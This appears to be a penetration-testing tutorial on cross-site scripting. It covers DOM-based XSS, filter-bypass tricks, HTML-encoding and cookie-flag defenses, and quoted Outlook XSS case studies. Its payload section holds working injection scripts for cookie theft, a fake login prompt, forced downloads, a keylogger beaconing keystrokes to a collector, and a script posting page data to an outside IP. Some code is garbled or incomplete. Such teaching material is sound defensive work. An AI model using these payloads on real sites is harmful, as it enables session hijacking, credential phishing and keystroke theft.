Conducting Penetration Testing using OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS)


Cross-site scripting (XSS) vulnerabilities happen when an application integrates external data into a new webpage without proper security checks or encoding. They can also occur when an existing webpage is modified with user-provided data using browser functions meant for creating HTML or JavaScript content. XSS enables attackers to run malicious scripts within a victim’s browser. These scripts can then hijack active user sessions, vandalize websites, or even redirect the user to harmful websites.

DOM-Based XSS

Proof of Concept

1
2
3
4
5
6

 DOM-based Cross-site Scripting

Hi,
 var pos = document.URL.indexOf("name=")+5; //finds the position of value
var userInput = document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
document.write(unescape(userInput));  //writes content to the webpage

Bypassing XSS Validation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

alert(1)
>alert(1)
 Download **Click me**
![](x)
![](image.bmp)
eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41));
alert(1)
```**Reference**  
[Uncle Jim's Javascript Utilities: CharCode Translator](http://jdstiles.com/java/cct.html)  
  

XSS Attack Payloads
------------------------

**Getting Cookie Data**

alert(document.cookie)

1

**Redirecting Users**

document.location=“http://www.google.com

1

**Modifying Content by ID**

document.getElementById(‘main_menu’).innerHTML = “Hello!”

1

**Modifying Content within the Body**

document.getElementsByTagName(‘body’)[0].innerHTML = “<img src="https://www.techworm.net/wp-content/uploads/2016/11/common-signs-youve-been-hacked-1.jpg" width="100%"/>” document.getElementsByTagName(‘body’)[0].innerHTML = “<iframe src="http://192.168.66.1/dvwa" width="100%" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100% "/>”

1

**Creating a Fake Login**

document.write(’Session timeout. Please login again.
’); document.write(’
’); document.write(’’); var string = “Password submitted to hacker website. ;)”; document.write(’’);

1

**Accessing Local File Content**

function readTextFile(file) { var rawFile = new XMLHttpRequest(); rawFile.open(“GET”, file, false); rawFile.onreadystatechange = function (){ alert(rawFile.responseText); } rawFile.send(null); }

1

**Forcing a Download**

var link = document.createElement(‘a’); link.href = ‘http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ‘’; document.body.appendChild(link); link.click();

var url=“http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; window.location = url;

1

**Logging Keystrokes**

var keys = 3; document.onkeypress = function(e) { var get = window.event ? event : e; var key = get.keyCode ? get.keyCode : get.charCode; key = String.fromCharCode(key); keys += key; } window.setInterval(function() { new Image().src = ‘http://localhost/keylogger/keylogger.php?c=’ + keys; keys = “”; }, 5);

1
2

**Obtaining HTTP Request Headers**  
_post.js_

var url = “http://localhost/dvwa/index.php”; $.ajax({ method: “GET”, url : url,success: function(data) { $.post(“http://192.168.24.101:8099/”, data);}});

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162

document.write('');
document.write('');
```  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsIEPqsW3sTizEyKngaDiVQRD_qE-GngQPTYWRDxBIYINMxqSEomQsJnGbY4kAuxGYvXirp3ODUYELzK4FjhXsAq4MK_mz_jWf3cp2qCLKTpdV59Rfe09adeVj1v2ep1LBhzCt_qDnvnEN/s640/nc_xss.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsIEPqsW3sTizEyKngaDiVQRD_qE-GngQPTYWRDxBIYINMxqSEomQsJnGbY4kAuxGYvXirp3ODUYELzK4FjhXsAq4MK_mz_jWf3cp2qCLKTpdV59Rfe09adeVj1v2ep1LBhzCt_qDnvnEN/s1600/nc_xss.PNG)

  

Gathering Information with JavaScript
--------------------------------------

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVrHxiwknqBx6loQmCzjj8-yLBUn1Q1karTcmIheZME8SEq2tlA46oqk-kq53VJiYdQVDawh3Q8l_ajIqG12KiorTiUQfJY7kvvvl6Yd0qQ3Uu89F2aXPfj9394dPivH24Vlneri_3rc0/s640/Screen+Shot+2018-02-16+at+5.40.35+PM.png)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVrHxiwknqBx6loQmCzjj8-yLBUn1Q1karTcmIheZME8SEq2tlA46oqk-kq53VJiYdQVDawh3Q8l_ajIqG12KiorTiUQfJY7kvvvl6Yd0qQ3Uu89F2aXPfj9394dPivH24Vlneri_3rc0/s1600/Screen+Shot+2018-02-16+at+5.40.35+PM.png)

[JS Recon](https://github.com/g4xyk00/JSrecon) by _g4xyk00_

Self XSS
--------

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTbOUComBM7ca2WZDS6QzKZbvNJPOxc-Htkl4FpVxiEy5KH9d4XnZaWXOMWF0_2lXIRJyw26NWIgPajHJ8e73JvyOoKyplJ2lvfAL1pxcVcVYFsp0krBiLFkTyUjzqfCzyKZCu8DuLjub/s640/selfxss.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTbOUComBM7ca2WZDS6QzKZbvNJPOxc-Htkl4FpVxiEy5KH9d4XnZaWXOMWF0_2lXIRJyw26NWIgPajHJ8e73JvyOoKyplJ2lvfAL1pxcVcVYFsp0krBiLFkTyUjzqfCzyKZCu8DuLjub/s1600/selfxss.PNG)

**Reference:** [https://www.facebook.com/help/246962205475854](https://www.facebook.com/help/246962205475854)  
  

XSS Defense Strategies
------------

### Defense 1: Encoding HTML

```
 $name = $_GET['name'];
  $name = htmlspecialchars($name, ENT_QUOTES, 'UTF-8'); //HTML Encoding
  echo "Hi, ".$name;
}
?> 
```

**Without HTML Encoding:**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh69mySmYRIgOl_q3GMLiJ01TyXw9flCf2t6E-oJe8zP29Ki955kL5kHFYzJPYB3c8Yt4reyiUq-7Loi5I1sgFCEWCZIyhDWnq0edyPdS-WfFxZjGwdLkq03E50wkwumGMtrBDnJAsoN4HK/s640/encode_without.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh69mySmYRIgOl_q3GMLiJ01TyXw9flCf2t6E-oJe8zP29Ki955kL5kHFYzJPYB3c8Yt4reyiUq-7Loi5I1sgFCEWCZIyhDWnq0edyPdS-WfFxZjGwdLkq03E50wkwumGMtrBDnJAsoN4HK/s1600/encode_without.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4OZqPjCWBBGekL9BEQmQASf_Q14i-t2ZGCEUK5fJMkqPiBDcBnYPfpsCNVmv0oc7xSGTWLvDoDQHRNpXxpkCs3-uIZlmbnQM0arleAqzQBKPQOSryMmBERl85U5qEmaW7kFmGmQ5sPj8/s640/encode_without_code.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4OZqPjCWBBGekL9BEQmQASf_Q14i-t2ZGCEUK5fJMkqPiBDcBnYPfpsCNVmv0oc7xSGTWLvDoDQHRNpXxpkCs3-uIZlmbnQM0arleAqzQBKPQOSryMmBERl85U5qEmaW7kFmGmQ5sPj8/s1600/encode_without_code.PNG)

**With HTML Encoding:**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcmJa-QbneC47IqTcNo8DbTE4SXtwf80ZqUJfeD4-9HjtG0RSdcRl_PIPgp6VxAtdNb776J3cgYWNv5Iv_1UCLOD8C3_xe2ZHjBDtHeKH3Ode1P_u7SUp0DSRtr0gy5-6WAJy6eCcfUK7u/s640/encode.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcmJa-QbneC47IqTcNo8DbTE4SXtwf80ZqUJfeD4-9HjtG0RSdcRl_PIPgp6VxAtdNb776J3cgYWNv5Iv_1UCLOD8C3_xe2ZHjBDtHeKH3Ode1P_u7SUp0DSRtr0gy5-6WAJy6eCcfUK7u/s1600/encode.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihtXlaHQypw9qVgxetndPqAggRFyL6_NV9sYcnUa1sZg-Zd0xx5ngprC5LJs78oyDMvbze3hDgOK8woEteTKMDIeYilNevwLecxk0EtpvcCpoVjPzRfL35WKIzLf5LSRKBWYsDJyALH-vs/s640/encode_code.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihtXlaHQypw9qVgxetndPqAggRFyL6_NV9sYcnUa1sZg-Zd0xx5ngprC5LJs78oyDMvbze3hDgOK8woEteTKMDIeYilNevwLecxk0EtpvcCpoVjPzRfL35WKIzLf5LSRKBWYsDJyALH-vs/s1600/encode_code.PNG)

### Defense 2: Implementing HTTPOnly and Secure Flags

**HTTPOnly Flag:** This prevents client-side scripts from accessing cookie data.

**Secure Flag:** This ensures that cookies are only transmitted over secure (HTTPS) connections.

  

```
 $name = $_GET['name'];  
  echo "Hi, ".$name;

}
?> 
```**Without HTTPOnly and Secure Flags**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzT-9hgSNgNmzsUIFLH1m_Y5KKWMdzy4Sdtq4hsFA2fHj4SJIs-V2wkbl89bdefACxE87lhY8aBVeWeU2z_azRtVdI1qkZeQ2AOtLODEoHCdvbtTeHVaCKJoYcB-KzN3wFRr0uWnvakpg/s640/secure+and+httponly+not+set.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVzT-9hgSNgNmzsUIFLH1m_Y5KKWMdzy4Sdtq4hsFA2fHj4SJIs-V2wkbl89bdefACxE87lhY8aBVeWeU2z_azRtVdI1qkZeQ2AOtLODEoHCdvbtTeHVaCKJoYcB-KzN3wFRr0uWnvakpg/s1600/secure+and+httponly+not+set.PNG)

  
**With HTTPOnly Flag Enabled**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtkPHHAFvw9gzLVEGm6dS_tf8_NklB6ezsZDNazqoEorCgZc4KsqcVUmZtej1erz-4Z282PLaiVOCzQXtEuMU44BxQq85l36JLOKR3TtT5hjymphP5DqNz3yGkwNSeJ96GWtEvdkA3Gcp/s640/httponly.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtkPHHAFvw9gzLVEGm6dS_tf8_NklB6ezsZDNazqoEorCgZc4KsqcVUmZtej1erz-4Z282PLaiVOCzQXtEuMU44BxQq85l36JLOKR3TtT5hjymphP5DqNz3yGkwNSeJ96GWtEvdkA3Gcp/s1600/httponly.PNG)

#### **Cross-Site Tracing (XST)**

Because the HTTPOnly flag is set, we cannot use Javascript to directly retrieve cookie data. However, we might try leveraging the TRACE/TRACK methods to potentially read cookie information from HTTP headers.

It's worth noting that many modern browsers will flag such an attempt as potentially "insecure," as shown in the screenshot.

**Payload**  
```
 var req = new XMLHttpRequest();
 req.open("TRACE", "http://localhost/vulnerable/xss/xss_flagset.php",false);
 req.send();
 result=req.responseText;
 alert(result); 
```  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL-WyDqd0Ch82RDAAa9BAqt0DVNwaURyGK7e9EvOZzcHGLXri6o3KrlW4K2EsJbRFTivO50g-BlWQpf7_XEmokakWWmRPfsAYwjVNxqySeRvW3isQ1EEx8Phxekb_8CiL5esdvLiwqfUMp/s640/xst+browser.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL-WyDqd0Ch82RDAAa9BAqt0DVNwaURyGK7e9EvOZzcHGLXri6o3KrlW4K2EsJbRFTivO50g-BlWQpf7_XEmokakWWmRPfsAYwjVNxqySeRvW3isQ1EEx8Phxekb_8CiL5esdvLiwqfUMp/s1600/xst+browser.PNG)

Firefox: The operation is insecure.

**Original Request**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHKoaKktOILuTqyRok-s9ZKbbgo3T2iPNoIdqbOX3JbwLNZB3CvB9guWuWho69hKe0wrbtwgl30E1Ygt-v_XHWclzRJ-IxzbERjUPUtLqPuBUgXlHKfSt5gDFOKznl9GkPfDsXNIX7nJd/s640/trace_get.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHKoaKktOILuTqyRok-s9ZKbbgo3T2iPNoIdqbOX3JbwLNZB3CvB9guWuWho69hKe0wrbtwgl30E1Ygt-v_XHWclzRJ-IxzbERjUPUtLqPuBUgXlHKfSt5gDFOKznl9GkPfDsXNIX7nJd/s1600/trace_get.PNG)

  
**Modified Request**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzp5YiK8KhxzV9PZyWnJaGSliejWDke34OgECuiEyCp3N6UYBLJcNjLcU9fujYUfxL9W1N9qY6mFCP05eIXNz2vxZ29KGkLSCGKOtabqXT3NDwEoiJzXqlRAhiF0NpQrWdM5uG6Bqb-stT/s640/trace_trace.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzp5YiK8KhxzV9PZyWnJaGSliejWDke34OgECuiEyCp3N6UYBLJcNjLcU9fujYUfxL9W1N9qY6mFCP05eIXNz2vxZ29KGkLSCGKOtabqXT3NDwEoiJzXqlRAhiF0NpQrWdM5uG6Bqb-stT/s1600/trace_trace.PNG)

  
**Response**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kgKQ5ScaedOREcYXBNuuvuO57hQoDdnay30AVByIkTEROqPv_Uya1QeoBsrY7vEuQmUdwmuuoIlZzqnKefWw2Nrn2sQONcr0JBAV2FoDJNEit1p452uQ85PPuqbk2tpPDJOifDbrxRgH/s640/trace_response.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kgKQ5ScaedOREcYXBNuuvuO57hQoDdnay30AVByIkTEROqPv_Uya1QeoBsrY7vEuQmUdwmuuoIlZzqnKefWw2Nrn2sQONcr0JBAV2FoDJNEit1p452uQ85PPuqbk2tpPDJOifDbrxRgH/s1600/trace_response.PNG)

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1c7WuUdhjHDmoyMutdvjDM5KJESM_8jsidd0fRPRqTsfunIAvijbeb2VwGyPAJHGocPhghQpnsTGVDxog0dnV6CcsGEKdeDoq7dGeuvvh6bQ470WaLj-rhNcTC4oKayYnRVHGM6sxm9sR/s640/trace_output.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1c7WuUdhjHDmoyMutdvjDM5KJESM_8jsidd0fRPRqTsfunIAvijbeb2VwGyPAJHGocPhghQpnsTGVDxog0dnV6CcsGEKdeDoq7dGeuvvh6bQ470WaLj-rhNcTC4oKayYnRVHGM6sxm9sR/s1600/trace_output.PNG)

This demonstrates how to potentially get cookie information through XSS combined with the TRACE method. 

**With Secure Flag Enabled (HTTP)**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT201cpMUt5KXxmRn4oBueJdR3fT7xmLsZWYG5qI81OXjDc46v0eJW7VK7Ln1WXaXWtHYRqcvsv7u9Vbo81DpJwEsUnuz7ytbL2phYCoxj1n3du1QVC-E-tNiC2YPP9MnA2qTGe0ofb0We/s640/secure_http.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT201cpMUt5KXxmRn4oBueJdR3fT7xmLsZWYG5qI81OXjDc46v0eJW7VK7Ln1WXaXWtHYRqcvsv7u9Vbo81DpJwEsUnuz7ytbL2phYCoxj1n3du1QVC-E-tNiC2YPP9MnA2qTGe0ofb0We/s1600/secure_http.PNG)

  
**With Secure Flag Enabled (HTTPS)**  
  

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikOGO6xE8RB5_ISHQv26PITGjjgRzhgEGAaCCSpxYYiHgJ1eZgMW7q63z4ss08M5uduGGa5aNMKwFJX7Kil03jCTAIek_DeSQ3CPcXYSZm5Qni69PkKik6zy9rwv1_sevP_21-3WZqqlH9/s640/secure_https.PNG)](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikOGO6xE8RB5_ISHQv26PITGjjgRzhgEGAaCCSpxYYiHgJ1eZgMW7q63z4ss08M5uduGGa5aNMKwFJX7Kil03jCTAIek_DeSQ3CPcXYSZm5Qni69PkKik6zy9rwv1_sevP_21-3WZqqlH9/s1600/secure_https.PNG)

  
  
  

XSS Case Studies
--------------

**January 16, 2019 - Compromising Fortnite Accounts**  
Reference: [https://research.checkpoint.com/hacking-fortnite/](https://research.checkpoint.com/hacking-fortnite/)  
  
  
  
**January 14, 2019 - Report: Five Major Web Hosting Providers Tested, All Easily Breached**  
Reference: [https://www.websiteplanet.com/blog/report-popular-hosting-hacked/](https://www.websiteplanet.com/blog/report-popular-hosting-hacked/)  
  
  
  
**July 19, 2019 - Outlook XSS Vulnerability**  
Reference: [https://leucosite.com/Microsoft-Office-365-Outlook-XSS/?q0&fbclid=IwAR0fjR4yHykQ5rtlv6ovtXqMg14M0AWW1TQF6nkp47bS0xjdql8t4QxvLUE](https://leucosite.com/Microsoft-Office-365-Outlook-XSS/?q0&fbclid=IwAR0fjR4yHykQ5rtlv6ovtXqMg14M0AWW1TQF6nkp47bS0xjdql8t4QxvLUE)  
  
**Outlook XSS via SVG Emoji**  
```
 //
 if(location.hostname=="attachment.outlook.office.net"){
     var qsplit=location.search.split("&");
  location='https://outlook.office.com/owa/service.svc/s/GetFileAttachment'+qsplit[0]+'&'+qsplit[1];
 }else{
  alert('XSS by @qab, location.hostname='+location.hostname);
 }
 // 
```  
  
**Outlook XSS using vCalendar**  
```
X-MICROSOFT-ONLINEMEETINGEXTERNALLINK:javascript:alert(document.domain);`@qab`
```
Licensed under CC BY-NC-SA 4.0
Last updated on Jul 05, 2024 01:13 +0100